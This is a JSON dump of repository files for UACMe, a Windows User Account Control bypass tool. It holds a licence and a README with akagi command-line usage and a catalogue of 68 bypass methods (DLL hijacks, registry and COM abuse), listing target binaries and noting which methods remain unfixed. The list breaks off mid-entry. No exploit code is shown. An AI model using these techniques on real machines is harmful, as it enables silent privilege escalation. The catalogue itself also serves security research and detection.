[
  {
    "path": ".gitattributes",
    "content": "# Auto detect text files and perform LF normalization\n* text=auto\n"
  },
  {
    "path": "LICENSE.md",
    "content": "Copyright (c) 2014 - 2025, UACMe Project\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n  list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n  this list of conditions and the following disclaimer in the documentation\n  and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n"
  },
  {
    "path": "README.md",
    "content": "# UACMe\nDefeating Windows User Account Control by abusing the built-in Windows AutoElevate backdoor. This project demonstrates various UAC bypass techniques and serves as an educational resource for understanding Windows security mechanisms.\n\n> ⚠️ **Warning**: This tool demonstrates security vulnerabilities that could be exploited maliciously. Use responsibly and only in controlled environments.\n\n# System Requirements\n\n* **Operating Systems**: Windows 7/8/8.1/10/11 (x86-32/x64, client; some methods also work on server versions)\n* **User Account**: Administrator account with UAC set to default settings\n\n## Usage\n\nRun the executable from the command line using the following syntax:\n\n```\nakagi32.exe [Method_Number] [Optional_Command]\n```\nor\n```\nakagi64.exe [Method_Number] [Optional_Command]\n```\n### Parameters:\n* **Method_Number**: Number corresponding to the UAC bypass method (see Methods List below)\n* **Optional_Command**: Full path to an executable file to run with elevated privileges\n  * If omitted, the program will launch an elevated command prompt (%systemroot%\\system32\\cmd.exe)\n\n### Examples:\n```\nakagi32.exe 23\nakagi64.exe 61\nakagi32.exe 23 c:\\windows\\system32\\calc.exe\nakagi64.exe 61 c:\\windows\\system32\\charmap.exe\n```\n\n\n> **Note**: Since version 3.5.0, all previously \"fixed\" methods are considered obsolete and have been removed. If you need them, use the [v3.2.x branch](https://github.com/hfiref0x/UACME/tree/v3.2.x).\n\n<details>\n  <summary>Keys (click to expand/collapse)</summary>\n\n1. 
Author: Leo Davidson\n   * Type: Dll Hijack\n   * Method: IFileOperation\n   * Target(s): \\system32\\sysprep\\sysprep.exe\n   * Component(s): cryptbase.dll\n   * Implementation: ucmStandardAutoElevation   \n   * Works from: Windows 7 (7600)\n   * Fixed in: Windows 8.1 (9600)\n      * How: sysprep.exe hardened LoadFrom manifest elements\n   * Code status: removed starting from v3.5.0 :tractor:\n2. Author: Leo Davidson derivative\n   * Type: Dll Hijack\n   * Method: IFileOperation\n   * Target(s): \\system32\\sysprep\\sysprep.exe\n   * Component(s): ShCore.dll\n   * Implementation: ucmStandardAutoElevation\n   * Works from: Windows 8.1 (9600)\n   * Fixed in: Windows 10 TP (> 9600)\n      * How: Side effect of ShCore.dll moving to \\KnownDlls\n   * Code status: removed starting from v3.5.0 :tractor:\n3. Author: Leo Davidson derivative by WinNT/Pitou\n   * Type: Dll Hijack\n   * Method: IFileOperation\n   * Target(s): \\system32\\oobe\\setupsqm.exe\n   * Component(s): WdsCore.dll\n   * Implementation: ucmStandardAutoElevation\n   * Works from: Windows 7 (7600)\n   * Fixed in: Windows 10 TH2 (10558)\n      * How: Side effect of OOBE redesign\n   * Code status: removed starting from v3.5.0 :tractor:\n4. Author: Jon Ericson, WinNT/Gootkit, mzH\n   * Type: AppCompat\n   * Method: RedirectEXE Shim\n   * Target(s): \\system32\\cliconfg.exe\n   * Component(s): -\n   * Implementation: ucmShimRedirectEXE\n   * Works from: Windows 7 (7600)\n   * Fixed in: Windows 10 TP (> 9600)\n      * How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versions\n   * Code status: removed starting from v3.5.0 :tractor:\n5. 
Author: WinNT/Simda\n   * Type: Elevated COM interface\n   * Method: ISecurityEditor\n   * Target(s): HKLM registry keys\n   * Component(s): -\n   * Implementation: ucmSimdaTurnOffUac\n   * Works from: Windows 7 (7600)\n   * Fixed in: Windows 10 TH1 (10147)\n      * How: ISecurityEditor interface method changed\n   * Code status: removed starting from v3.5.0 :tractor:\n6. Author: Win32/Carberp\n   * Type: Dll Hijack\n   * Method: WUSA\n   * Target(s): \\ehome\\mcx2prov.exe, \\system32\\migwiz\\migwiz.exe\n   * Component(s): WdsCore.dll, CryptBase.dll, CryptSP.dll\n   * Implementation: ucmWusaMethod\n   * Works from: Windows 7 (7600)\n   * Fixed in: Windows 10 TH1 (10147)\n      * How: WUSA /extract option removed\n   * Code status: removed starting from v3.5.0 :tractor:\n7. Author: Win32/Carberp derivative\n   * Type: Dll Hijack\n   * Method: WUSA\n   * Target(s): \\system32\\cliconfg.exe\n   * Component(s): ntwdblib.dll\n   * Implementation: ucmWusaMethod\n   * Works from: Windows 7 (7600)\n   * Fixed in: Windows 10 TH1 (10147)\n      * How: WUSA /extract option removed\n   * Code status: removed starting from v3.5.0 :tractor:\n8. Author: Leo Davidson derivative by Win32/Tilon\n   * Type: Dll Hijack\n   * Method: IFileOperation\n   * Target(s): \\system32\\sysprep\\sysprep.exe\n   * Component(s): Actionqueue.dll\n   * Implementation: ucmStandardAutoElevation\n   * Works from: Windows 7 (7600)\n   * Fixed in: Windows 8.1 (9600)\n      * How: sysprep.exe hardened LoadFrom manifest\n   * Code status: removed starting from v3.5.0 :tractor:\n9. 
Author: Leo Davidson, WinNT/Simda, Win32/Carberp derivative\n   * Type: Dll Hijack\n   * Method: IFileOperation, ISecurityEditor, WUSA\n   * Target(s): IFEO registry keys, \\system32\\cliconfg.exe\n   * Component(s): Attacker defined Application Verifier Dll\n   * Implementation: ucmAvrfMethod\n   * Works from: Windows 7 (7600)\n   * Fixed in: Windows 10 TH1 (10147)\n      * How: WUSA /extract option removed, ISecurityEditor interface method changed\n   * Code status: removed starting from v3.5.0 :tractor:\n10. Author: WinNT/Pitou, Win32/Carberp derivative\n      * Type: Dll Hijack\n      * Method: IFileOperation, WUSA\n      * Target(s): \\system32\\\\{New}or{Existing}\\\\{autoelevated}.exe, e.g. winsat.exe\n      * Component(s): Attacker defined dll, e.g. PowProf.dll, DevObj.dll\n      * Implementation: ucmWinSATMethod\n      * Works from: Windows 7 (7600)\n      * Fixed in: Windows 10 TH2 (10548) \n        * How: AppInfo elevated application path control hardening\n      * Code status: removed starting from v3.5.0 :tractor:\n11. Author: Jon Ericson, WinNT/Gootkit, mzH\n      * Type: AppCompat\n      * Method: Shim Memory Patch\n      * Target(s): \\system32\\iscsicli.exe\n      * Component(s): Attacker prepared shellcode\n      * Implementation: ucmShimPatch\n      * Works from: Windows 7 (7600)\n      * Fixed in: Windows 8.1 (9600)\n         * How: Sdbinst.exe autoelevation removed, KB3045645/KB3048097 for rest Windows versions\n      * Code status: removed starting from v3.5.0 :tractor:\n12. Author: Leo Davidson derivative\n      * Type: Dll Hijack\n      * Method: IFileOperation\n      * Target(s): \\system32\\sysprep\\sysprep.exe\n      * Component(s): dbgcore.dll\n      * Implementation: ucmStandardAutoElevation\n      * Works from: Windows 10 TH1 (10240)\n      * Fixed in: Windows 10 TH2 (10565)\n        * How: sysprep.exe manifest updated\n      * Code status: removed starting from v3.5.0 :tractor:\n13. 
Author: Leo Davidson derivative\n     * Type: Dll Hijack\n     * Method: IFileOperation\n     * Target(s): \\system32\\mmc.exe EventVwr.msc\n     * Component(s): elsext.dll\n     * Implementation: ucmMMCMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS1 (14316)\n        * How: Missing dependency removed\n      * Code status: removed starting from v3.5.0 :tractor:\n14. Author: Leo Davidson, WinNT/Sirefef derivative\n     * Type: Dll Hijack\n     * Method: IFileOperation\n     * Target(s): \\system\\credwiz.exe, \\system32\\wbem\\oobe.exe\n     * Component(s): netutils.dll\n     * Implementation: ucmSirefefMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 TH2 (10548)\n        * How: AppInfo elevated application path control hardening\n      * Code status: removed starting from v3.5.0 :tractor:\n15. Author: Leo Davidson, Win32/Addrop, Metasploit derivative\n     * Type: Dll Hijack\n     * Method: IFileOperation\n     * Target(s): \\system32\\cliconfg.exe\n     * Component(s): ntwdblib.dll\n     * Implementation: ucmGenericAutoelevation\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS1 (14316)\n        * How: Cliconfg.exe autoelevation removed\n      * Code status: removed starting from v3.5.0 :tractor:\n16. Author: Leo Davidson derivative\n     * Type: Dll Hijack\n     * Method: IFileOperation\n     * Target(s): \\system32\\GWX\\GWXUXWorker.exe, \\system32\\inetsrv\\inetmgr.exe\n     * Component(s): SLC.dll\n     * Implementation: ucmGWX\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS1 (14316)\n        * How: AppInfo elevated application path control and inetmgr executable hardening\n      * Code status: removed starting from v3.5.0 :tractor:\n17. 
Author: Leo Davidson derivative\n     * Type: Dll Hijack (Import forwarding)\n     * Method: IFileOperation\n     * Target(s): \\system32\\sysprep\\sysprep.exe\n     * Component(s): unbcl.dll\n     * Implementation: ucmStandardAutoElevation2\n     * Works from: Windows 8.1 (9600)\n     * Fixed in: Windows 10 RS1 (14371)\n        * How: sysprep.exe manifest updated\n      * Code status: removed starting from v3.5.0 :tractor:\n18. Author: Leo Davidson derivative\n     * Type: Dll Hijack (Manifest)\n     * Method: IFileOperation\n     * Target(s): \\system32\\taskhost.exe, \\system32\\tzsync.exe (any ms exe without manifest)\n     * Component(s): Attacker defined\n     * Implementation: ucmAutoElevateManifest\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS1 (14371)\n        * How: Manifest parsing logic reviewed\n      * Code status: removed starting from v3.5.0 :tractor:\n19. Author: Leo Davidson derivative\n     * Type: Dll Hijack\n     * Method: IFileOperation\n     * Target(s): \\system32\\inetsrv\\inetmgr.exe\n     * Component(s): MsCoree.dll\n     * Implementation: ucmInetMgrMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS1 (14376)\n        * How: inetmgr.exe executable manifest hardening, MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images\n      * Code status: removed starting from v3.5.0 :tractor:\n20. Author: Leo Davidson derivative\n     * Type: Dll Hijack\n     * Method: IFileOperation\n     * Target(s): \\system32\\mmc.exe, Rsop.msc\n     * Component(s): WbemComn.dll\n     * Implementation: ucmMMCMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS3 (16232)\n        * How: Target requires wbemcomn.dll to be signed by MS\n      * Code status: removed starting from v3.5.0 :tractor:\n21. 
Author: Leo Davidson derivative\n     * Type: Dll Hijack\n     * Method: IFileOperation, SxS DotLocal\n     * Target(s): \\system32\\sysprep\\sysprep.exe\n     * Component(s): comctl32.dll\n     * Implementation: ucmSXSMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS3 (16232)\n        * How: MitigationPolicy->ProcessImageLoadPolicy->PreferSystem32Images\n      * Code status: removed starting from v3.5.0 :tractor:\n22. Author: Leo Davidson derivative\n     * Type: Dll Hijack\n     * Method: IFileOperation, SxS DotLocal\n     * Target(s): \\system32\\consent.exe\n     * Component(s): comctl32.dll\n     * Implementation: ucmSXSMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v2.5.0\n23. Author: Leo Davidson derivative\n     * Type: Dll Hijack\n     * Method: IFileOperation\n     * Target(s): \\system32\\pkgmgr.exe\n     * Component(s): DismCore.dll\n     * Implementation: ucmDismMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v2.5.1\n24. Author: BreakingMalware\n     * Type: Shell API\n     * Method: Environment variables expansion\n     * Target(s): \\system32\\CompMgmtLauncher.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmCometMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS2 (15031)\n        * How: CompMgmtLauncher.exe autoelevation removed\n      * Code status: removed starting from v3.5.0 :tractor:\n25. 
Author: Enigma0x3\n     * Type: Shell API\n     * Method: Registry key manipulation\n     * Target(s): \\system32\\EventVwr.exe, \\system32\\CompMgmtLauncher.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmHijackShellCommandMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS2 (15031)\n        * How: EventVwr.exe redesigned, CompMgmtLauncher.exe autoelevation removed\n      * Code status: removed starting from v3.5.0 :tractor:\n26. Author: Enigma0x3\n     * Type: Race Condition\n     * Method: File overwrite\n     * Target(s): %temp%\\GUID\\dismhost.exe\n     * Component(s): LogProvider.dll\n     * Implementation: ucmDiskCleanupRaceCondition\n     * Works from: Windows 10 TH1 (10240)\n     * AlwaysNotify compatible\n     * Fixed in: Windows 10 RS2 (15031)\n        * How: File security permissions altered\n      * Code status: removed starting from v3.5.0 :tractor:\n27. Author: ExpLife\n     * Type: Elevated COM interface\n     * Method: IARPUninstallStringLauncher\n     * Target(s): Attacker defined\n     * Component(s): Attacker defined\n     * Implementation: ucmUninstallLauncherMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS3 (16199)\n        * How: UninstallStringLauncher interface removed from COMAutoApprovalList\n      * Code status: removed starting from v3.5.0 :tractor:\n28. Author: Exploit/Sandworm\n     * Type: Whitelisted component\n     * Method: InfDefaultInstall\n     * Target(s): Attacker defined\n     * Component(s): Attacker defined\n     * Implementation: ucmSandwormMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 8.1 (9600)\n        * How: InfDefaultInstall.exe removed from g_lpAutoApproveEXEList (MS14-060)\n      * Code status: removed starting from v3.5.0 :tractor:\n29. 
Author: Enigma0x3\n     * Type: Shell API\n     * Method: Registry key manipulation\n     * Target(s): \\system32\\sdclt.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmAppPathMethod\n     * Works from: Windows 10 TH1 (10240)\n     * Fixed in: Windows 10 RS3 (16215)\n        * How: Shell API update\n      * Code status: removed starting from v3.5.0 :tractor:\n30. Author: Leo Davidson derivative, lhc645\n     * Type: Dll Hijack\n     * Method: WOW64 logger\n     * Target(s): \\syswow64\\\\{any elevated exe, e.g wusa.exe}\n     * Component(s): wow64log.dll\n     * Implementation: ucmWow64LoggerMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v2.7.0\n31. Author: Enigma0x3\n     * Type: Shell API\n     * Method: Registry key manipulation\n     * Target(s): \\system32\\sdclt.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmSdcltIsolatedCommandMethod\n     * Works from: Windows 10 TH1 (10240)\n     * Fixed in: Windows 10 RS4 (17025)\n        * How: Shell API / Windows components update\n      * Code status: removed starting from v3.5.0 :tractor:\n32. Author: xi-tauw\n     * Type: Dll Hijack\n     * Method: UIPI bypass with uiAccess application\n     * Target(s): \\Program Files\\Windows Media Player\\osk.exe, \\system32\\EventVwr.exe, \\system32\\mmc.exe\n     * Component(s): duser.dll, osksupport.dll\n     * Implementation: ucmUiAccessMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v2.7.1\n33. Author: winscripting.blog\n     * Type: Shell API\n     * Method: Registry key manipulation\n     * Target(s): \\system32\\fodhelper.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmShellRegModMethod\n     * Works from: Windows 10 TH1 (10240)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v2.7.2\n34. 
Author: James Forshaw\n     * Type: Shell API\n     * Method: Environment variables expansion\n     * Target(s): \\system32\\svchost.exe via \\system32\\schtasks.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmDiskCleanupEnvironmentVariable\n     * Works from: Windows 8.1 (9600)\n     * AlwaysNotify compatible\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v2.7.2\n35. Author: CIA & James Forshaw\n     * Type: Impersonation\n     * Method: Token Manipulations\n     * Target(s): Autoelevated applications\n     * Component(s): Attacker defined\n     * Implementation: ucmTokenModification\n     * Works from: Windows 7 (7600)\n     * AlwaysNotify compatible, see note\n     * Fixed in: Windows 10 RS5 (17686)\n        * How: ntoskrnl.exe->SeTokenCanImpersonate additional access token check added\n      * Code status: removed starting from v3.5.0 :tractor:\n36. Author: Thomas Vanhoutte aka SandboxEscaper\n     * Type: Race condition\n     * Method: NTFS reparse point & Dll Hijack\n     * Target(s): wusa.exe, pkgmgr.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmJunctionMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v2.7.4\n37. Author: Ernesto Fernandez, Thomas Vanhoutte\n     * Type: Dll Hijack\n     * Method: SxS DotLocal, NTFS reparse point\n     * Target(s): \\system32\\dccw.exe\n     * Component(s): GdiPlus.dll\n     * Implementation: ucmSXSDccwMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v2.7.5\n38. 
Author: Clement Rouault\n     * Type: Whitelisted component\n     * Method: APPINFO command line spoofing\n     * Target(s): \\system32\\mmc.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmHakrilMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v2.7.6\n39. Author: Stefan Kanthak\n     * Type: Dll Hijack\n     * Method: .NET Code Profiler\n     * Target(s): \\system32\\mmc.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmCorProfilerMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v2.7.7\n40. Author: Ruben Boonen\n     * Type: COM Handler Hijack\n     * Method: Registry key manipulation\n     * Target(s): \\system32\\mmc.exe, \\system32\\recdisc.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmCOMHandlersMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 19H1 (18362)\n        * How: Side effect of Windows changes\n      * Code status: removed starting from v3.5.0 :tractor:\n41. Author: Oddvar Moe\n     * Type: Elevated COM interface\n     * Method: ICMLuaUtil\n     * Target(s): Attacker defined\n     * Component(s): Attacker defined\n     * Implementation: ucmCMLuaUtilShellExecMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v2.7.9\n42. Author: BreakingMalware and Enigma0x3\n     * Type: Elevated COM interface\n     * Method: IFwCplLua\n     * Target(s): Attacker defined\n     * Component(s): Attacker defined\n     * Implementation: ucmFwCplLuaMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS4 (17134)\n        * How: Shell API update\n      * Code status: removed starting from v3.5.0 :tractor:\n43. 
Author: Oddvar Moe derivative\n     * Type: Elevated COM interface\n     * Method: IColorDataProxy, ICMLuaUtil\n     * Target(s): Attacker defined\n     * Component(s): Attacker defined\n     * Implementation: ucmDccwCOMMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v2.8.3\n44. Author: bytecode77\n     * Type: Shell API\n     * Method: Environment variables expansion\n     * Target(s): Multiple auto-elevated processes\n     * Component(s): Various per target\n     * Implementation: ucmVolatileEnvMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS3 (16299)\n        * How: Current user system directory variables ignored during process creation\n      * Code status: removed starting from v3.5.0 :tractor:\n45. Author: bytecode77\n     * Type: Shell API\n     * Method: Registry key manipulation\n     * Target(s): \\system32\\slui.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmSluiHijackMethod\n     * Works from: Windows 8.1 (9600)\n     * Fixed in: Windows 10 20H1 (19041)\n        * How: Side effect of Windows changes\n      * Code status: removed starting from v3.5.0 :tractor:\n46. Author: Anonymous\n     * Type: Race Condition\n     * Method: Registry key manipulation\n     * Target(s): \\system32\\BitlockerWizardElev.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmBitlockerRCMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS4 (>16299)\n        * How: Shell API update\n      * Code status: removed starting from v3.5.0 :tractor:\n47. 
Author: clavoillotte & 3gstudent\n     * Type: COM Handler Hijack\n     * Method: Registry key manipulation\n     * Target(s): \\system32\\mmc.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmCOMHandlersMethod2\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 19H1 (18362)\n        * How: Side effect of Windows changes\n      * Code status: removed starting from v3.5.0 :tractor:\n48. Author: deroko\n     * Type: Elevated COM interface\n     * Method: ISPPLUAObject\n     * Target(s): Attacker defined\n     * Component(s): Attacker defined\n     * Implementation: ucmSPPLUAObjectMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS5 (17763)\n        * How: ISPPLUAObject interface method changed \n      * Code status: removed starting from v3.5.0 :tractor:\n49. Author: RinN\n     * Type: Elevated COM interface\n     * Method: ICreateNewLink\n     * Target(s): \\system32\\TpmInit.exe\n     * Component(s): WbemComn.dll\n     * Implementation: ucmCreateNewLinkMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS1 (14393) \n        * How: Side effect of consent.exe COMAutoApprovalList introduction\n      * Code status: removed starting from v3.5.0 :tractor:\n50. Author: Anonymous\n     * Type: Elevated COM interface\n     * Method: IDateTimeStateWrite, ISPPLUAObject\n     * Target(s): w32time service\n     * Component(s): w32time.dll\n     * Implementation: ucmDateTimeStateWriterMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS5 (17763)\n        * How: Side effect of ISPPLUAObject interface change\n      * Code status: removed starting from v3.5.0 :tractor:\n51. 
Author: bytecode77 derivative\n     * Type: Elevated COM interface\n     * Method: IAccessibilityCplAdmin\n     * Target(s): \\system32\\rstrui.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmAcCplAdminMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS4 (17134)\n        * How: Shell API update\n      * Code status: removed starting from v3.5.0 :tractor:\n52. Author: David Wells\n     * Type: Whitelisted component\n     * Method: AipNormalizePath parsing abuse\n     * Target(s): Attacker defined\n     * Component(s): Attacker defined\n     * Implementation: ucmDirectoryMockMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\t\t\n      * Code status: added in v3.0.4\n53. Author: Emeric Nasi\n     * Type: Shell API\n     * Method: Registry key manipulation\n     * Target(s): \\system32\\sdclt.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmShellRegModMethod\n     * Works from: Windows 10 (14393)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.1.3\n54. Author: egre55\n     * Type: Dll Hijack\n     * Method: Dll path search abuse\n     * Target(s): \\syswow64\\SystemPropertiesAdvanced.exe and other SystemProperties*.exe\n     * Component(s): \\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll\n     * Implementation: ucmEgre55Method\n     * Works from: Windows 10 (14393)\n     * Fixed in: Windows 10 19H1 (18362)\n        * How: SysDm.cpl!_CreateSystemRestorePage has been updated for secured load library call\n      * Code status: removed starting from v3.5.0 :tractor:\n55. 
Author: James Forshaw\n     * Type: GUI Hack\n     * Method: UIPI bypass with token modification\n     * Target(s): \\system32\\osk.exe, \\system32\\msconfig.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmTokenModUIAccessMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS5 (17763), a part of patch, 2024 year\n        * How: When integrity level of an UIAccess token is lowered, the UIAccess property is removed\n      * Code status: added in v3.1.5\n56. Author: Hashim Jawad\n     * Type: Shell API\n     * Method: Registry key manipulation\n     * Target(s): \\system32\\WSReset.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmShellRegModMethod2\n     * Works from: Windows 10 (17134)\n     * Fixed in: Windows 11 (22000)\n        * How: Windows components redesign\n      * Code status: removed starting from v3.5.7 :tractor:\n57. Author: Leo Davidson derivative by Win32/Gapz\n     * Type: Dll Hijack\n     * Method: IFileOperation\n     * Target(s): \\system32\\sysprep\\sysprep.exe\n     * Component(s): unattend.dll\n     * Implementation: ucmStandardAutoElevation\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 8.1 (9600)\n        * How: sysprep.exe hardened LoadFrom manifest elements\n      * Code status: removed starting from v3.5.0 :tractor:\n58. Author: RinN\n     * Type: Elevated COM interface\n     * Method: IEditionUpgradeManager\n     * Target(s): \\system32\\clipup.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmEditionUpgradeManagerMethod\n     * Works from: Windows 10 (14393)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.2.0\n59. 
Author: James Forshaw\n     * Type: AppInfo ALPC\n     * Method: RAiLaunchAdminProcess and DebugObject\n     * Target(s): Attacker defined\n     * Component(s): Attacker defined\n     * Implementation: ucmDebugObjectMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.2.3\n60. Author: Enigma0x3 derivative by WinNT/Glupteba\n     * Type: Shell API\n     * Method: Registry key manipulation\n     * Target(s): \\system32\\CompMgmtLauncher.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmGluptebaMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 10 RS2 (15063)\n        * How: CompMgmtLauncher.exe autoelevation removed\n      * Code status: removed starting from v3.5.0 :tractor:\n61. Author: Enigma0x3/bytecode77 derivative by Nassim Asrir\n     * Type: Shell API\n     * Method: Registry key manipulation\n     * Target(s): \\system32\\slui.exe, \\system32\\changepk.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmShellRegModMethod\n     * Works from: Windows 10 (14393)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\t\t\n      * Code status: added in v3.2.5\n62. Author: winscripting.blog\n     * Type: Shell API\n     * Method: Registry key manipulation\n     * Target(s): \\system32\\computerdefaults.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmShellRegModMethod\n     * Works from: Windows 10 RS4 (17134)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.2.6\n63. Author: Arush Agarampur\n     * Type: Dll Hijack\n     * Method: ISecurityEditor\n     * Target(s): Native Image Cache elements\n     * Component(s): Attacker defined\n     * Implementation: ucmNICPoisonMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.2.7\n64. 
Author: Arush Agarampur\n     * Type: Elevated COM interface\n     * Method: IIEAxiAdminInstaller, IIEAxiInstaller2, IFileOperation\n     * Target(s): IE add-on install cache\n     * Component(s): Attacker defined\n     * Implementation: ucmIeAddOnInstallMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.5.1\n65. Author: Arush Agarampur\n     * Type: Elevated COM interface\n     * Method: IWscAdmin\n     * Target(s): Shell Protocol Hijack\n     * Component(s): Attacker defined\n     * Implementation: ucmWscActionProtocolMethod\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 11 24H2 (26100)\n        * How: Side effect of Windows changes\n      * Code status: added in v3.5.2\n66. Author: Arush Agarampur\n     * Type: Elevated COM interface\n     * Method: IFwCplLua, Shell Protocol Hijack\n     * Target(s): Shell protocol registry entry and environment variables\n     * Component(s): Attacker defined\n     * Implementation: ucmFwCplLuaMethod2\n     * Works from: Windows 7 (7600)\n     * Fixed in: Windows 11 24H2 (26100)\n        * How: Side effect of Windows changes\n      * Code status: added in v3.5.3\n67. Author: Arush Agarampur\n     * Type: Shell API\n     * Method: Shell Protocol Hijack\n     * Target(s): \\system32\\fodhelper.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmMsSettingsProtocolMethod\n     * Works from: Windows 10 TH1 (10240)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.5.4\n68. Author: Arush Agarampur\n     * Type: Shell API\n     * Method: Shell Protocol Hijack\n     * Target(s): \\system32\\wsreset.exe\n     * Component(s): Attacker defined\n     * Implementation: ucmMsStoreProtocolMethod\n     * Works from: Windows 10 RS5 (17763)\n     * Fixed in: unfixed :see_no_evil:\n        * How: -\n      * Code status: added in v3.5.5\n69. 
